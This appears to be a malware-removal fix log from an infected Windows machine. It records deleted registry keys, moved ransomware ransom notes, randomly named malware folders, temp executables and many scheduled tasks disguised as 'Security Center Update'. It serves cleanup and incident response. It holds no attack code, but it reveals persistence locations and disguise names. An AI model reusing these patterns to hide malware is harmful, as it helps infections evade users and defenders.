HKCR\CLSID\{AA58ED58-01DD-4d91-8333-CF10577473F7} => Key not found. 
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{7F96F190-09C4-4BEC-B7FB-A9E26151EAB0}}" => Key deleted successfully.
HKCR\Wow6432Node\CLSID\{7F96F190-09C4-4BEC-B7FB-A9E26151EAB0}} => Key not found. 
HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar\\{2318C2B1-4965-11d4-9B18-009027A5CD4F} => value deleted successfully.
HKCR\CLSID\{2318C2B1-4965-11d4-9B18-009027A5CD4F} => Key not found. 
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} => value deleted successfully.
HKCR\CLSID\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} => Key not found. 
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{0C5C3F02-879E-42E8-8113-9C0FA649DB90}\\NameServer => value deleted successfully.
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{462105B1-AF78-47E3-AC0D-109F28027A93}\\NameServer => value deleted successfully.
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D}\\NameServer => value deleted successfully.
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{9B004C7D-7A34-4A9C-BEDB-5212A582FAB1}\\NameServer => value deleted successfully.
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{D24FA36B-6CD5-4603-8F72-73AC28D99F5B}\\NameServer => value deleted successfully.
C:\Users\Dorothy01\HELP_DECRYPT.HTML => Moved successfully.
C:\Users\Dorothy01\Downloads\HELP_DECRYPT.HTML => Moved successfully.
C:\Users\Dorothy01\Desktop\HELP_DECRYPT.HTML => Moved successfully.
C:\Users\Dorothy01\HELP_DECRYPT.TXT => Moved successfully.
C:\Users\Dorothy01\Downloads\HELP_DECRYPT.TXT => Moved successfully.
C:\Users\Dorothy01\Desktop\HELP_DECRYPT.TXT => Moved successfully.
C:\Users\Dorothy01\HELP_DECRYPT.URL => Moved successfully.
C:\Users\Dorothy01\Downloads\HELP_DECRYPT.URL => Moved successfully.
C:\Users\Dorothy01\Desktop\HELP_DECRYPT.URL => Moved successfully.
C:\HELP_DECRYPT.URL => Moved successfully.
C:\Users\Dorothy01\AppData\Local\pckunie.dll => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Adhoxi => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\unpacked23206 => Moved successfully.
C:\ProgramData\bamgaq => Moved successfully.
C:\Users\Dorothy01\AppData\Local\{30112b75-e574-a6db-560c-8103291a0838} => Moved successfully.
C:\ProgramData\PenulErhig => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Kuseyd => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Guhyanmo => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Veepme => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Kybeuv => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Wiudiz => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Tapyara => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Rifiewyn => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Ynopqual => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Ihywkead => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Ekmiys => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Maypyz => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Fuwutee => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Fyarxy => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Zekubuab => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Wuwuec => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Byloaq => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Yhohybe => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Hovoote => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Amcyocut => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Itsefo => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Tumiexcu => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Ziqeexew => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Mawywopo => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Icxeewhu => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Ucucni => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Edutsoix => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Ruyxku => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Huqokayx => Moved successfully.
C:\ProgramData\TifwIdyo => Moved successfully.
C:\ProgramData\BolsiWelug => Moved successfully.
C:\ProgramData\PeboZnoli => Moved successfully.
C:\ProgramData\CecuSefki => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Itufefv => Moved successfully.
C:\ProgramData\FapziGguzq => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Senyzayr => Moved successfully.
C:\ProgramData\QiktiWuffu => Moved successfully.
C:\ProgramData\FadyOdyu => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Zacosia => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Ecqootfi => Moved successfully.
C:\ProgramData\TixoZuwu => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Ymqiuky => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Qaedxa => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Hyipfy => Moved successfully.
C:\ProgramData\EiniHubex => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Woakduwa => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Obmukany => Moved successfully.
C:\ProgramData\GuxeXowi => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Gynika => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Egewtoi => Moved successfully.
C:\ProgramData\MokeVike => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Pevyliu => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Ciokov => Moved successfully.
C:\ProgramData\MesmAyof => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Ohvyev => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Esisgyl => Moved successfully.
C:\ProgramData\LuqePana => Moved successfully.
C:\ProgramData\YuctAren => Moved successfully.
C:\ProgramData\GiqyoCxuko => Moved successfully.
C:\ProgramData\JoheMsum => Moved successfully.
C:\ProgramData\JahebSuhvo => Moved successfully.
C:\ProgramData\HozbEzpud => Moved successfully.
C:\ProgramData\FasuTuhu => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Ytbynede => Moved successfully.
C:\ProgramData\NeheQiri => Moved successfully.
C:\ProgramData\KaseJolmi => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Ezrydu => Moved successfully.
C:\ProgramData\UardiNdeca => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Sequefb => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Onpyym => Moved successfully.
C:\ProgramData\UopiJowv => Moved successfully.
C:\ProgramData\DervUvon => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Ezupuhaf => Moved successfully.
C:\ProgramData\PokuGehos => Moved successfully.
C:\ProgramData\NerxElyo => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Upvukyy => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Olaqduqo => Moved successfully.
C:\ProgramData\PapoSutul => Moved successfully.
C:\ProgramData\MoruYemq => Moved successfully.
C:\ProgramData\JufhEnusi => Moved successfully.
C:\ProgramData\YansAjfir => Moved successfully.
C:\ProgramData\KitpUxijo => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Ugmedia => Moved successfully.
C:\ProgramData\XiceNnar => Moved successfully.
C:\ProgramData\TobaFisa => Moved successfully.
C:\Users\Dorothy01\AppData\Local\tmp1461 => Moved successfully.
C:\ProgramData\@system.temp => Moved successfully.
C:\ProgramData\@system3.att => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\1B477081.reg => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\893686b8 => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\HELP_DECRYPT.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\HELP_DECRYPT.PNG => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\HELP_DECRYPT.TXT => Moved successfully.
 
"C:\Users\Dorothy01\AppData\Roaming\????" directory move:
 
Could not move "C:\Users\Dorothy01\AppData\Roaming\????" directory. => Scheduled to move on reboot.
 
C:\Users\Dorothy01\AppData\Local\893686b8 => Moved successfully.
C:\Users\Dorothy01\AppData\Local\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Local\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Local\f5e83w4ef.dat => Moved successfully.
C:\Users\Dorothy01\AppData\Local\HELP_DECRYPT.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Local\HELP_DECRYPT.PNG => Moved successfully.
C:\Users\Dorothy01\AppData\Local\HELP_DECRYPT.TXT => Moved successfully.
"C:\Users\Dorothy01\AppData\Local\pckunie.dll" => File/Directory not found.
C:\Users\Dorothy01\AppData\Local\pgkunge.dll => Moved successfully.
C:\ProgramData\893686b8 => Moved successfully.
"C:\ProgramData\@system.temp" => File/Directory not found.
"C:\ProgramData\@system3.att" => File/Directory not found.
C:\ProgramData\HELP_DECRYPT.HTML => Moved successfully.
C:\ProgramData\HELP_DECRYPT.PNG => Moved successfully.
C:\ProgramData\HELP_DECRYPT.TXT => Moved successfully.
"C:\Users\Dorothy01\AppData\Local\Temp\getmhost.exe" => File/Directory not found.
C:\Users\Dorothy01\AppData\Local\Temp\ARS.exe => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Temp\dllnt_dump.dll => Moved successfully.
"C:\Users\Dorothy01\AppData\Local\Temp\getmhost.exe" => File/Directory not found.
C:\Users\Dorothy01\AppData\Local\Temp\ivbhim.exe => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Temp\jre-8u31-windows-au.exe => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Temp\sqlite3.dll => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Temp\tmp7A9C.tmp.exe => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0AF68A16-8BB9-4884-9B4E-15D4F360BB7B}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0AF68A16-8BB9-4884-9B4E-15D4F360BB7B}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 2036164130 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 2036164130" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0C23B36F-F62C-434F-AA02-5ADBADF1858B}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0C23B36F-F62C-434F-AA02-5ADBADF1858B}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 2231539794 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 2231539794" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{14653784-6568-4765-B81E-19CEB2C29EEF}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{14653784-6568-4765-B81E-19CEB2C29EEF}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 304447838 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 304447838" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1DE689D1-D5D6-4E99-9906-A33502FF48FF}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1DE689D1-D5D6-4E99-9906-A33502FF48FF}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 3156874879 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 3156874879" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{29FD53A0-B0E0-4AC5-A535-A77BDBAB7300}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{29FD53A0-B0E0-4AC5-A535-A77BDBAB7300}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 1511213846 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 1511213846" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{34D40EAE-6659-4B8C-8F0E-5D9D8F76EE87}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{34D40EAE-6659-4B8C-8F0E-5D9D8F76EE87}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 3665910781 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 3665910781" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{38AD3EE9-89B1-4FE8-BD3A-C268041E30AB}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{38AD3EE9-89B1-4FE8-BD3A-C268041E30AB}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 3379427597 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 3379427597" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{46591690-E2C7-4AB5-90B8-0807BF83FA2E}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{46591690-E2C7-4AB5-90B8-0807BF83FA2E}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 1219234967 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 1219234967" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{4FE7F4B5-6216-4BF5-B69B-AE6DCAB85ACC}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4FE7F4B5-6216-4BF5-B69B-AE6DCAB85ACC}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 951185298 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 951185298" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{506490F7-3376-4EFC-A901-586AA3303B44}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{506490F7-3376-4EFC-A901-586AA3303B44}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 2325803103 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 2325803103" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{516E887F-D9AA-43E6-A51E-2905BC435DC3}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{516E887F-D9AA-43E6-A51E-2905BC435DC3}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 1528112639 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 1528112639" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{58DBAADD-4BFC-48F9-A19E-02A3DBE8DB7A}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{58DBAADD-4BFC-48F9-A19E-02A3DBE8DB7A}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 2901739987 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 2901739987" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{62015E40-868F-450C-BB00-4F2987356F87}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{62015E40-868F-450C-BB00-4F2987356F87}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 3903236305 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 3903236305" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{636CB7B6-8835-4A64-A923-ED55EB0D8640}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{636CB7B6-8835-4A64-A923-ED55EB0D8640}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 2512843633 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 2512843633" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{6378A9C8-1406-4725-9242-44BFD048B5CE}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6378A9C8-1406-4725-9242-44BFD048B5CE}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 331106455 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 331106455" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{639A2A23-A522-40F7-AD5D-9F1245DF1A82}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{639A2A23-A522-40F7-AD5D-9F1245DF1A82}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 2487970780 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 2487970780" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{6BB0DD4F-FC46-49AF-B590-4F9F44C7E1A7}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6BB0DD4F-FC46-49AF-B590-4F9F44C7E1A7}" => Key deleted successfully.
C:\Windows\System32\Tasks\rspahma => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\rspahma" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{70C6EC5A-CD9A-41DE-8073-EBF9E70D4E54}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{70C6EC5A-CD9A-41DE-8073-EBF9E70D4E54}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 3838766864 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 3838766864" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{72165FBF-954D-4040-B5B5-BC5F9EED3A0E}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{72165FBF-954D-4040-B5B5-BC5F9EED3A0E}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 3216473386 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 3216473386" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7430F638-B12A-445A-BBEF-5E8F514DF753}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7430F638-B12A-445A-BBEF-5E8F514DF753}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 699896687 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 699896687" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7444E2A1-12CB-40A5-B56A-3E21543B4514}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7444E2A1-12CB-40A5-B56A-3E21543B4514}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 3204526539 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 3204526539" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{797B7B84-6E57-4129-A6A9-7A7099782A48}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{797B7B84-6E57-4129-A6A9-7A7099782A48}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 242654636 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 242654636" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7BB4C936-AFE9-405B-8288-876487348757}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7BB4C936-AFE9-405B-8288-876487348757}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 116467704 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 116467704" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7E32FCE3-C859-49A2-8E75-598B56230006}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7E32FCE3-C859-49A2-8E75-598B56230006}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 4028262528 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 4028262528" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{833517E7-60C9-4EBA-B5E2-E1A24D86CE1A}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{833517E7-60C9-4EBA-B5E2-E1A24D86CE1A}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 2519066445 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 2519066445" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{86BAB3C1-BEB4-4F5B-9723-D319FC15EB44}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{86BAB3C1-BEB4-4F5B-9723-D319FC15EB44}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 1810362612 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 1810362612" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8A4EFB2F-EFF1-4B4C-A1E0-641064B8C832}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8A4EFB2F-EFF1-4B4C-A1E0-641064B8C832}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 3747167081 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 3747167081" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{91474FF9-C8FF-4F7E-B671-C5BAA856571C}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{91474FF9-C8FF-4F7E-B671-C5BAA856571C}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 513270047 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 513270047" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9A50C6A9-6D3C-4A7F-B237-D2E34D535BAF}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9A50C6A9-6D3C-4A7F-B237-D2E34D535BAF}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 4149247359 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 4149247359" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9BD8C08F-7F0B-430E-AD7D-12988F4D4D76}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9BD8C08F-7F0B-430E-AD7D-12988F4D4D76}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 1179286971 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 1179286971" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9CD254AC-60CC-41FE-B8C7-884BAC0FA4A3}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9CD254AC-60CC-41FE-B8C7-884BAC0FA4A3}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 1285267939 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 1285267939" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9DB27102-BD01-4DBA-AA72-192BAC09BFE7}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9DB27102-BD01-4DBA-AA72-192BAC09BFE7}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 3201999599 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 3201999599" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A24B621A-54AB-4FAF-9C35-FB0D87321DD4}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A24B621A-54AB-4FAF-9C35-FB0D87321DD4}" => Key deleted successfully.
